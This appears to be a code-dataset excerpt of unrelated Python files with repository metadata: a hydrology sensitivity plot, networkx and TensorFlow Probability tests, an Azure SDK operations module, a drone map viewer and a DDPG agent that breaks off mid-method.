df = read_pickle(os.path.join(dataframe, filename))
df.to_csv(os.path.join(fig_path, 'sample_df_basic_2.csv'))
pass
print df
xx = 1
for index, row in df.iterrows():
fig = plt.figure(xx, figsize=(20, 10))
ax1 = fig.add_subplot(111)
ax2 = ax1.twiny()
ax3 = ax1.twiny()
fig.subplots_adjust(bottom=0.2)
print 'shape temps: {}, shape row[0]: {}'.format(len(temps), len(row[0]))
ax2.plot(temps, row[0], 'black', label='Temperature (+/- 5 deg C)', marker='8')
ax1.plot(display_pct, row[1], 'blue', label='Precipitation (+/- 50%)', marker='8')
ax1.plot(display_pct, row[2], 'purple', label='Reference Evapotranspiration (+/- 50%)', marker='8')
ax1.plot(display_pct, row[3], 'brown', label='Total Available Water (+/- 50%)', marker='8')
ax3.plot(ndvi, row[4], 'green', linestyle='-.', label='Normalized Density Vegetation\n'
' Index Conversion Factor (0.9 - 1.8)', marker='8')
ax1.plot(display_pct, row[5], 'red', label='Soil Hydraulic Conductivity (+/- 50%)', marker='8')
ax1.set_xlabel(r"Parameter Change (%)", fontsize=16)
ax1.set_ylabel(r"Total Recharge in 14-Year Simulation (mm)", fontsize=16)
ax2.set_xlabel(r"Temperature Change (C)", fontsize=16)
ax2.xaxis.set_ticks_position("bottom")
ax2.xaxis.set_label_position("bottom")
ax2.spines["bottom"].set_position(("axes", -0.15))
ax2.set_frame_on(True)
ax2.patch.set_visible(False)
for sp in ax2.spines.itervalues():
sp.set_visible(False)
ax2.spines['bottom'].set_visible(True)
ax3.set_xlabel(r"NDVI to Crop Coefficient Conversion Factor", fontsize=16)
ax3.xaxis.set_ticks_position("top")
ax3.xaxis.set_label_position("top")
# ax3.spines["top"].set_position(("axes", 1.0))
ax3.set_frame_on(True)
ax3.patch.set_visible(False)
for sp in ax3.spines.itervalues():
sp.set_visible(False)
ax3.spines['top'].set_visible(True)
plt.title('Variation of ETRM Pysical Parameters at {}'.format(str(index).replace('_', ' ')),
y=1.08, fontsize=20)
handle1, label1 = ax1.get_legend_handles_labels()
handle2, label2 = ax2.get_legend_handles_labels()
handle3, label3 = ax3.get_legend_handles_labels()
handles, labels = handle1 + handle2 + handle3, label1 + label2 + label3
ax1.legend(handles, labels, loc=0)
if show:
plt.show()
# if fig_path:
# plt.savefig(os.path.join(fig_path, '{}_spider'.format(index)), dpi=600, ext='jpg', close=True,
# verbose=True)
plt.close(fig)
if __name__ == '__main__':
root = os.path.join('F:\\', 'ETRM_Inputs')
sensitivity = os.path.join(root, 'sensitivity_analysis')
pickles = os.path.join(sensitivity, 'pickled')
figure_save_path = os.path.join(sensitivity, 'figures')
make_spider_plot(pickles, NDVI_RANGE, ALL_PCT, TEMPS, figure_save_path, show=True)
# ========================== EOF ==============================================
|
[
"[email protected]"
] | |
677993bbfd1033c8a7be8606b387754616bdceda
|
853d4cec42071b76a80be38c58ffe0fbf9b9dc34
|
/venv/Lib/site-packages/networkx/algorithms/isomorphism/tests/test_tree_isomorphism.py
|
3082365a4bb61f2d8c99fcddb56c72e2af1d0aeb
|
[] |
no_license
|
msainTesting/TwitterAnalysis
|
5e1646dbf40badf887a86e125ef30a9edaa622a4
|
b1204346508ba3e3922a52380ead5a8f7079726b
|
refs/heads/main
| 2023-08-28T08:29:28.924620 | 2021-11-04T12:36:30 | 2021-11-04T12:36:30 | 424,242,582 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,443 |
py
|
import networkx as nx
import random
import time
from networkx.classes.function import is_directed
from networkx.algorithms.isomorphism.tree_isomorphism import (
rooted_tree_isomorphism,
tree_isomorphism,
)
# have this work for graph
# given two trees (either the directed or undirected)
# transform t2 according to the isomorphism
# and confirm it is identical to t1
# randomize the order of the edges when constructing
def check_isomorphism(t1, t2, isomorphism):
# get the name of t1, given the name in t2
mapping = {v2: v1 for (v1, v2) in isomorphism}
# these should be the same
d1 = is_directed(t1)
d2 = is_directed(t2)
assert d1 == d2
edges_1 = []
for (u, v) in t1.edges():
if d1:
edges_1.append((u, v))
else:
# if not directed, then need to
# put the edge in a consistent direction
if u < v:
edges_1.append((u, v))
else:
edges_1.append((v, u))
edges_2 = []
for (u, v) in t2.edges():
# translate to names for t1
u = mapping[u]
v = mapping[v]
if d2:
edges_2.append((u, v))
else:
if u < v:
edges_2.append((u, v))
else:
edges_2.append((v, u))
return sorted(edges_1) == sorted(edges_2)
def test_hardcoded():
print("hardcoded test")
# define a test problem
edges_1 = [
("a", "b"),
("a", "c"),
("a", "d"),
("b", "e"),
("b", "f"),
("e", "j"),
("e", "k"),
("c", "g"),
("c", "h"),
("g", "m"),
("d", "i"),
("f", "l"),
]
edges_2 = [
("v", "y"),
("v", "z"),
("u", "x"),
("q", "u"),
("q", "v"),
("p", "t"),
("n", "p"),
("n", "q"),
("n", "o"),
("o", "r"),
("o", "s"),
("s", "w"),
]
# there are two possible correct isomorphisms
# it currently returns isomorphism1
# but the second is also correct
isomorphism1 = [
("a", "n"),
("b", "q"),
("c", "o"),
("d", "p"),
("e", "v"),
("f", "u"),
("g", "s"),
("h", "r"),
("i", "t"),
("j", "y"),
("k", "z"),
("l", "x"),
("m", "w"),
]
# could swap y and z
isomorphism2 = [
("a", "n"),
("b", "q"),
("c", "o"),
("d", "p"),
("e", "v"),
("f", "u"),
("g", "s"),
("h", "r"),
("i", "t"),
("j", "z"),
("k", "y"),
("l", "x"),
("m", "w"),
]
t1 = nx.Graph()
t1.add_edges_from(edges_1)
root1 = "a"
t2 = nx.Graph()
t2.add_edges_from(edges_2)
root2 = "n"
isomorphism = sorted(rooted_tree_isomorphism(t1, root1, t2, root2))
# is correct by hand
assert (isomorphism == isomorphism1) or (isomorphism == isomorphism2)
# check algorithmically
assert check_isomorphism(t1, t2, isomorphism)
# try again as digraph
t1 = nx.DiGraph()
t1.add_edges_from(edges_1)
root1 = "a"
t2 = nx.DiGraph()
t2.add_edges_from(edges_2)
root2 = "n"
isomorphism = sorted(rooted_tree_isomorphism(t1, root1, t2, root2))
# is correct by hand
assert (isomorphism == isomorphism1) or (isomorphism == isomorphism2)
# check algorithmically
assert check_isomorphism(t1, t2, isomorphism)
# randomly swap a tuple (a,b)
def random_swap(t):
(a, b) = t
if random.randint(0, 1) == 1:
return (a, b)
else:
return (b, a)
# given a tree t1, create a new tree t2
# that is isomorphic to t1, with a known isomorphism
# and test that our algorithm found the right one
def positive_single_tree(t1):
assert nx.is_tree(t1)
nodes1 = [n for n in t1.nodes()]
# get a random permutation of this
nodes2 = nodes1.copy()
random.shuffle(nodes2)
# this is one isomorphism, however they may be multiple
# so we don't necessarily get this one back
someisomorphism = [(u, v) for (u, v) in zip(nodes1, nodes2)]
# map from old to new
map1to2 = {u: v for (u, v) in someisomorphism}
# get the edges with the transformed names
edges2 = [random_swap((map1to2[u], map1to2[v])) for (u, v) in t1.edges()]
# randomly permute, to ensure we're not relying on edge order somehow
random.shuffle(edges2)
# so t2 is isomorphic to t1
t2 = nx.Graph()
t2.add_edges_from(edges2)
# lets call our code to see if t1 and t2 are isomorphic
isomorphism = tree_isomorphism(t1, t2)
# make sure we got a correct solution
# although not necessarily someisomorphism
assert len(isomorphism) > 0
assert check_isomorphism(t1, t2, isomorphism)
# run positive_single_tree over all the
# non-isomorphic trees for k from 4 to maxk
# k = 4 is the first level that has more than 1 non-isomorphic tree
# k = 13 takes about 2.86 seconds to run on my laptop
# larger values run slow down significantly
# as the number of trees grows rapidly
def test_positive(maxk=14):
print("positive test")
for k in range(2, maxk + 1):
start_time = time.time()
trial = 0
for t in nx.nonisomorphic_trees(k):
positive_single_tree(t)
trial += 1
print(k, trial, time.time() - start_time)
# test the trivial case of a single node in each tree
# note that nonisomorphic_trees doesn't work for k = 1
def test_trivial():
print("trivial test")
# back to an undirected graph
t1 = nx.Graph()
t1.add_node("a")
root1 = "a"
t2 = nx.Graph()
t2.add_node("n")
root2 = "n"
isomorphism = rooted_tree_isomorphism(t1, root1, t2, root2)
assert isomorphism == [("a", "n")]
assert check_isomorphism(t1, t2, isomorphism)
# test another trivial case where the two graphs have
# different numbers of nodes
def test_trivial_2():
print("trivial test 2")
edges_1 = [("a", "b"), ("a", "c")]
edges_2 = [("v", "y")]
t1 = nx.Graph()
t1.add_edges_from(edges_1)
t2 = nx.Graph()
t2.add_edges_from(edges_2)
isomorphism = tree_isomorphism(t1, t2)
# they cannot be isomorphic,
# since they have different numbers of nodes
assert isomorphism == []
# the function nonisomorphic_trees generates all the non-isomorphic
# trees of a given size. Take each pair of these and verify that
# they are not isomorphic
# k = 4 is the first level that has more than 1 non-isomorphic tree
# k = 11 takes about 4.76 seconds to run on my laptop
# larger values run slow down significantly
# as the number of trees grows rapidly
def test_negative(maxk=11):
print("negative test")
for k in range(4, maxk + 1):
test_trees = list(nx.nonisomorphic_trees(k))
start_time = time.time()
trial = 0
for i in range(len(test_trees) - 1):
for j in range(i + 1, len(test_trees)):
trial += 1
assert tree_isomorphism(test_trees[i], test_trees[j]) == []
print(k, trial, time.time() - start_time)
|
[
"[email protected]"
] | |
42d0987e6e1898a0e5f60a297e7db42a013fab6d
|
bcf332d2f6ef6970cfaa480400a112ecee3f16b8
|
/stage07-artist2/s1level42.py
|
c5f34c2ae0814db387a0d43027c8ee7cd714f9b1
|
[
"Unlicense"
] |
permissive
|
skilstak/code-dot-org-python
|
e1907d29f3727060e5064a5eefd68a0f9f4f5c70
|
ba127124386ecfdc20bd84592b3c271f8205d748
|
refs/heads/master
| 2020-04-04T19:34:23.531210 | 2015-07-10T12:39:19 | 2015-07-10T12:39:19 | 26,862,410 | 7 | 4 | null | 2014-11-21T20:28:20 | 2014-11-19T13:24:30 |
Python
|
UTF-8
|
Python
| false | false | 465 |
py
|
"""Stage 7: Puzzle 8 of 11
Here's the solution to the previous puzzle. Can you add just 2 more
lines of code to complete the drawing?
"""
import sys
sys.path.append('..')
import codestudio
artist = codestudio.load('s1level42')
artist.speed = 'faster'
a = artist
for count2 in range(10):
artist.color = artist.random_color()
for count in range(4):
artist.move_forward(20)
artist.turn_right(90)
artist.move_forward(20)
artist.check()
|
[
"[email protected]"
] | |
a3c03bb30d7ab9d2444696500ece8c13bfd13edd
|
2fabea234735beefc980b77b213fcb0dfb394980
|
/tensorflow_probability/python/math/sparse_test.py
|
aca018215524f5574b3df657c781c4d51d85533d
|
[
"Apache-2.0"
] |
permissive
|
tarrou/probability
|
0eee452b525a6e6b3c7c98d467468e47f07e861b
|
d4d80a1c04ad0b3e98758ebc3f7f82887274384d
|
refs/heads/master
| 2020-08-08T11:16:42.441268 | 2019-12-06T17:35:17 | 2019-12-06T17:35:17 | 213,819,828 | 0 | 0 |
Apache-2.0
| 2019-10-09T04:20:19 | 2019-10-09T04:20:19 | null |
UTF-8
|
Python
| false | false | 6,549 |
py
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for sparse ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.internal import test_case
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
def _assert_sparse_tensor_value(test_case_instance, expected, actual):
test_case_instance.assertEqual(np.int64, np.array(actual.indices).dtype)
test_case_instance.assertAllEqual(expected.indices, actual.indices)
test_case_instance.assertEqual(
np.array(expected.values).dtype, np.array(actual.values).dtype)
test_case_instance.assertAllEqual(expected.values, actual.values)
test_case_instance.assertEqual(np.int64, np.array(actual.dense_shape).dtype)
test_case_instance.assertAllEqual(expected.dense_shape, actual.dense_shape)
@test_util.run_all_in_graph_and_eager_modes
class SparseTest(test_case.TestCase):
# Copied (with modifications) from:
# tensorflow/contrib/layers/python/ops/sparse_ops.py.
def test_dense_to_sparse_1d(self):
st = tfp.math.dense_to_sparse([1, 0, 2, 0])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.int32)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([1, 2], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_float(self):
st = tfp.math.dense_to_sparse([1.5, 0.0, 2.3, 0.0])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.float32)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllClose([1.5, 2.3], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_bool(self):
st = tfp.math.dense_to_sparse([True, False, True, False])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.bool)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([True, True], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_str(self):
st = tfp.math.dense_to_sparse([b'qwe', b'', b'ewq', b''])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.object)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([b'qwe', b'ewq'], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_str_special_ignore(self):
st = tfp.math.dense_to_sparse(
[b'qwe', b'', b'ewq', b''], ignore_value=b'qwe')
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.object)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[1], [2], [3]], result.indices)
self.assertAllEqual([b'', b'ewq', b''], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_2d(self):
st = tfp.math.dense_to_sparse([[1, 2, 0, 0], [3, 4, 5, 0]])
result = self.evaluate(st)
self.assertAllEqual([[0, 0], [0, 1], [1, 0], [1, 1], [1, 2]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5], result.values)
self.assertAllEqual([2, 4], result.dense_shape)
def test_dense_to_sparse_3d(self):
st = tfp.math.dense_to_sparse(
[[[1, 2, 0, 0],
[3, 4, 5, 0]],
[[7, 8, 0, 0],
[9, 0, 0, 0]]])
result = self.evaluate(st)
self.assertAllEqual(
[[0, 0, 0],
[0, 0, 1],
[0, 1, 0],
[0, 1, 1],
[0, 1, 2],
[1, 0, 0],
[1, 0, 1],
[1, 1, 0]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5, 7, 8, 9], result.values)
self.assertAllEqual([2, 2, 4], result.dense_shape)
def test_dense_to_sparse_unknown_1d_shape(self):
tensor = tf1.placeholder_with_default(
np.array([0, 100, 0, 3], np.int32), shape=[None])
st = tfp.math.dense_to_sparse(tensor)
result = self.evaluate(st)
self.assertAllEqual([[1], [3]], result.indices)
self.assertAllEqual([100, 3], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_unknown_3d_shape(self):
tensor = tf1.placeholder_with_default(
np.array([[[1, 2, 0, 0], [3, 4, 5, 0]], [[7, 8, 0, 0], [9, 0, 0, 0]]],
np.int32),
shape=[None, None, None])
st = tfp.math.dense_to_sparse(tensor)
result = self.evaluate(st)
self.assertAllEqual(
[[0, 0, 0],
[0, 0, 1],
[0, 1, 0],
[0, 1, 1],
[0, 1, 2],
[1, 0, 0],
[1, 0, 1],
[1, 1, 0]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5, 7, 8, 9], result.values)
self.assertAllEqual([2, 2, 4], result.dense_shape)
def test_dense_to_sparse_unknown_rank(self):
ph = tf1.placeholder_with_default(
np.array([[1, 2, 0, 0], [3, 4, 5, 0]], np.int32), shape=None)
st = tfp.math.dense_to_sparse(ph)
result = self.evaluate(st)
self.assertAllEqual(
[[0, 0],
[0, 1],
[1, 0],
[1, 1],
[1, 2]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5], result.values)
self.assertAllEqual([2, 4], result.dense_shape)
if __name__ == '__main__':
tf.test.main()
|
[
"[email protected]"
] | |
d9fd3e3f6f7c3d6c386072c39ae5b4202edd2d08
|
2f3c4ea9f0a9ab60a38fa8afc9087b327da643be
|
/Cross-Validation/validacao_cruzada_cross_val_score.py
|
5c5d20ef1eee0fe967bf20593a4b9ef4a4db4711
|
[] |
no_license
|
guilhermelamb/Machine-Learning-Studies
|
e919c74f4b881c049b87b46191e65f3f77235d13
|
1abff5a0a063636468b00c68015f1a8c8b058757
|
refs/heads/main
| 2023-08-19T07:55:01.538452 | 2021-10-12T15:13:05 | 2021-10-12T15:13:05 | 333,989,001 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 787 |
py
|
import pandas as pd
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.impute import SimpleImputer
from sklearn.model_selection import cross_val_score
from sklearn.naive_bayes import GaussianNB
base = pd.read_csv('credit_data.csv')
base.loc[base.age < 0, 'age'] = 40.92
previsores = base.iloc[:, 1:4].values
classe = base.iloc[:,4].values
imputer = SimpleImputer(missing_values = np.nan, strategy='mean')
imputer = imputer.fit(previsores[:,1:4])
previsores[:,1:4] = imputer.transform(previsores[:,1:4])
scaler = StandardScaler()
previsores = scaler.fit_transform(previsores)
classificador = GaussianNB()
resultados = cross_val_score(classificador, previsores, classe, cv = 10)
resultado_final = resultados.mean()
resultado_std = resultados.std()
|
[
"[email protected]"
] | |
1b5849466318aa075976375e01fa22fddd690edc
|
531c47c15b97cbcb263ec86821d7f258c81c0aaf
|
/sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_08_01/operations/_network_interface_load_balancers_operations.py
|
e42bd6eccf89e6b11dbf117b8ae8f3bcc1bcf2ca
|
[
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] |
permissive
|
YijunXieMS/azure-sdk-for-python
|
be364d3b88204fd3c7d223df23756386ff7a3361
|
f779de8e53dbec033f98f976284e6d9491fd60b3
|
refs/heads/master
| 2021-07-15T18:06:28.748507 | 2020-09-04T15:48:52 | 2020-09-04T15:48:52 | 205,457,088 | 1 | 2 |
MIT
| 2020-06-16T16:38:15 | 2019-08-30T21:08:55 |
Python
|
UTF-8
|
Python
| false | false | 5,600 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfaceLoadBalancersOperations(object):
"""NetworkInterfaceLoadBalancersOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceLoadBalancerListResult"]
"""List all load balancers in a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceLoadBalancerListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_08_01.models.NetworkInterfaceLoadBalancerListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceLoadBalancerListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceLoadBalancerListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/loadBalancers'} # type: ignore
|
[
"[email protected]"
] | |
950b22a78a928e4427896cec1ba0d7c4cac4e011
|
6a4bfff7fcd78a0057401652c7f80d9a95a67267
|
/painless_redirects/tests/test_models.py
|
2f5b98013047caa595a23ef12657abfbbafe3877
|
[
"MIT"
] |
permissive
|
benzkji/django-painless-redirects
|
25987ff984830be7e45b4d0af9a9cd0046beabe7
|
153721486b214ddd5365b6ac5769129562254dd5
|
refs/heads/master
| 2023-05-24T14:23:53.783400 | 2020-06-22T10:35:29 | 2020-06-22T10:35:29 | 22,944,463 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 558 |
py
|
"""Tests for the models of the painless_redirects app."""
from django.test import TestCase
from . import factories
class RedirectModelTestCase(TestCase):
def test_model(self):
obj = factories.RedirectFactory()
self.assertTrue(obj.pk)
def test_redirect_value(self):
obj = factories.RedirectFactory()
self.assertEqual(obj.redirect_value('http'), "/the-new-path/")
obj.new_site = factories.SiteFactory()
self.assertEqual(obj.redirect_value('https'), "https://%s/the-new-path/" % obj.new_site.domain)
|
[
"[email protected]"
] | |
b5dd9c0170e9576edc3884cda967bd39951aad8f
|
13fa6b903547618d567c3284b9dc637024800947
|
/Código-fonte/navigation/SLAM/map_view.py
|
0d40fc571f4a21cc1956f3e290760dd3e68519b6
|
[] |
no_license
|
EvoSystems-com-br/IniciacaoCientifica2018_ProjetoDrones
|
cc5a8a91dbc007cad85000a31465ed3950980bd1
|
8af0ca6930b326ae7bc0cd7bb9aa2d6aa62bceeb
|
refs/heads/master
| 2020-03-26T11:49:31.933492 | 2018-10-30T19:41:16 | 2018-10-30T19:41:16 | 144,861,611 | 0 | 3 | null | 2018-10-30T19:41:19 | 2018-08-15T14:11:58 |
Python
|
UTF-8
|
Python
| false | false | 2,335 |
py
|
import cv2
import time
import math
import numpy as np
PIXEL_RATE = 1.75
OFFSET_X = 60
OFFSET_Y = 50
RANGE_Y = 150
CIRCLE_RADIO = 15
MARKER_SIZE = 20
class MapView():
def __init__(self):
self.esquema = cv2.imread("data/esquema.png")
self.esquema = cv2.resize(self.esquema, (480, 360))
self.drone = cv2.imread("data/drone.png")
self.drone = cv2.resize(self.drone, (48, 36))
self.updateMap([[50], [0],[180]])
def updateMap(self, X):
self.map = self.esquema.copy()
self.drawDrone(X[0][0], X[1][0], X[2][0])
n_marker = int((len(X)/3) - 1)
for i in range(n_marker):
x1 = X[3+3*i][0]
y1 = X[4+3*i][0]
beta = X[5+3*i][0] *3.14/180
x2 = x1 - MARKER_SIZE*math.sin(beta)
y2 = y1 + MARKER_SIZE*math.cos(beta)
#Transforma coordenada em cm para coordenada em pixel
coord_x1 = int(OFFSET_X + x1*PIXEL_RATE)
coord_y1 = int(OFFSET_Y + (RANGE_Y-y1)*PIXEL_RATE)
coord_x2 = int(OFFSET_X + x2*PIXEL_RATE)
coord_y2 = int(OFFSET_Y + (RANGE_Y-y2)*PIXEL_RATE)
self.map = cv2.line(self.map, (coord_x1, coord_y1),
(coord_x2, coord_y2), (19, 69,139), 5)
def drawDrone(self, x, y, alpha):
#Transforma coordenada em cm para coordenada em pixel
coord_x = int(OFFSET_X + x*PIXEL_RATE)
coord_y = int(OFFSET_Y + (RANGE_Y-y)*PIXEL_RATE)
cv2.circle(self.map, (coord_x, coord_y), CIRCLE_RADIO, (255, 0, 0), -1)
#desenha a orientação do drone
p1_x = coord_x + CIRCLE_RADIO*math.cos((alpha+30)*3.14/180)
p1_y = coord_y - CIRCLE_RADIO*math.sin((alpha+30)*3.14/180)
p2_x = coord_x + CIRCLE_RADIO*math.cos((alpha-30)*3.14/180)
p2_y = coord_y - CIRCLE_RADIO*math.sin((alpha-30)*3.14/180)
p3_x = coord_x + 2*CIRCLE_RADIO*math.cos((alpha)*3.14/180)
p3_y = coord_y - 2*CIRCLE_RADIO*math.sin((alpha)*3.14/180)
pts = np.array([[p1_x, p1_y],[p2_x,p2_y],[p3_x,p3_y]], np.int32)
pts = pts.reshape((-1,1,2))
cv2.fillPoly(self.map,[pts],(255,0,0))
def showMap(self):
while(True):
cv2.imshow("mapa", self.map)
if cv2.waitKey(100) & 0xFF == ord('q'):
break
|
[
"[email protected]"
] | |
19414b707e9497314917d44fc6119c2108d592fe
|
833f76620c02f4a02a19b3a2e13b0de6b947a28a
|
/agent.py
|
cb3a86f7f5228415e5fae3aa84580b222a4b80d4
|
[] |
no_license
|
dszokolics/deepRL-continuous-control
|
0bf9af540b1cd4211da5f018a8f57fb7b6dcf0aa
|
6dfcb247fa792bcd794bf481a1cea1cb84f3a073
|
refs/heads/master
| 2023-04-27T17:18:34.014978 | 2021-05-16T10:24:16 | 2021-05-16T10:24:16 | 367,846,375 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,626 |
py
|
import numpy as np
import random
import copy
from collections import namedtuple, deque
import torch
import torch.nn.functional as F
import torch.optim as optim
from model import Actor, Critic
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Agent():
"""Interacts with and learns from the environment."""
def __init__(self, state_size, action_size, random_seed, num_agents, agent_params):
"""Initialize an Agent object.
Based on https://github.com/udacity/deep-reinforcement-learning/blob/master/ddpg-pendulum/ddpg_agent.py
Params
======
state_size (int): dimension of each state
action_size (int): dimension of each action
random_seed (int): random seed
"""
self.state_size = state_size
self.action_size = action_size
self.seed = random.seed(random_seed)
self.params = agent_params
# Actor Network (w/ Target Network)
self.actor_local = Actor(state_size, action_size, random_seed).to(device)
self.actor_target = Actor(state_size, action_size, random_seed).to(device)
self.actor_optimizer = optim.Adam(self.actor_local.parameters(), lr=self.params["lr_actor"])
# Critic Network (w/ Target Network)
self.critic_local = Critic(state_size, action_size, random_seed).to(device)
self.critic_target = Critic(state_size, action_size, random_seed).to(device)
self.critic_optimizer = optim.Adam(
self.critic_local.parameters(), lr=self.params["lr_critic"], weight_decay=self.params["weight_decay"]
)
# Noise process
self.noise = OUNoise(action_size, random_seed, num_agents)
# Replay memory
self.memory = ReplayBuffer(action_size, self.params["buffer_size"], self.params["batch_size"], random_seed)
self.steps_since_last_update = 0
def step(self, state, action, reward, next_state, done):
"""Save experience in replay memory, and use random sample from buffer to learn."""
# Save experience / reward
self.memory.add(state, action, reward, next_state, done)
self.steps_since_last_update += 1
# Learn, if enough samples are available in memory
if len(self.memory) > self.params["batch_size"]:
if self.steps_since_last_update % self.params["update_every"]:
for _ in range(self.params["update_batch_number"]):
experiences = self.memory.sample()
self.learn(experiences, self.params["gamma"])
def act(self, state, add_noise=True):
"""Returns actions for given state as per current policy."""
state = torch.from_numpy(state).float().to(device)
self.actor_local.eval()
with torch.no_grad():
action = self.actor_local(state).cpu().data.numpy()
self.actor_local.train()
if add_noise:
action += self.noise.sample()
return np.clip(action, -1, 1)
def reset(self):
self.noise.reset()
def learn(self, experiences, gamma):
"""Update policy and value parameters using given batch of experience tuples.
Q_targets = r + γ * critic_target(next_state, actor_target(next_state))
where:
actor_target(state) -> action
critic_target(state, action) -> Q-value
Params
======
experiences (Tuple[torch.Tensor]): tuple of (s, a, r, s', done) tuples
gamma (float): discount factor
"""
states, actions, rewards, next_states, dones = experiences
# ---------------------------- update critic ---------------------------- #
# Get predicted next-state actions and Q values from target models
actions_next = self.actor_target(next_states)
Q_targets_next = self.critic_target(next_states, actions_next)
# Compute Q targets for current states (y_i)
